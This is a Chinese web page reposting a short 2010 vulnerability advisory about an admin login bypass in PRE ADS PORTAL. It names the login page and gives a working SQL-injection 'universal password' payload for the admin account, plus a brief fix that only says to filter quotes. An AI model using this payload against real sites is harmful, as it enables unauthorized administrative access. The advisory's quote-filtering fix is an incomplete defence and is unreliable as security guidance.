文章详情

  • 游戏榜单
  • 软件榜单
关闭导航
热搜榜
热门下载
热门标签
php爱好者> php文档>PRE ADS PORTAL 后台验证绕过(万能密码)漏洞

PRE ADS PORTAL 后台验证绕过(万能密码)漏洞

时间:2010-11-14  来源:Cru3l.b0y

发布日期:2010-11.14
发布作者:Cru3l.b0y

影响版本:未知
官方地址:http://www.preproject.com

漏洞类型:密码验证
漏洞描述:后台密码验证设计错误,导致万能密码绕过漏洞。

漏洞测试:

登录页面 signinform.php

Username : admin

Password : 1'or'1'='1
 

 

修复方案:过滤掉引号~

 

 

标签分类:

相关阅读 更多 +
排行榜 更多 +
瓢虫少女

瓢虫少女

飞行射击 下载
潜艇鱼雷

潜艇鱼雷

飞行射击 下载
网络掠夺者

网络掠夺者

飞行射击 下载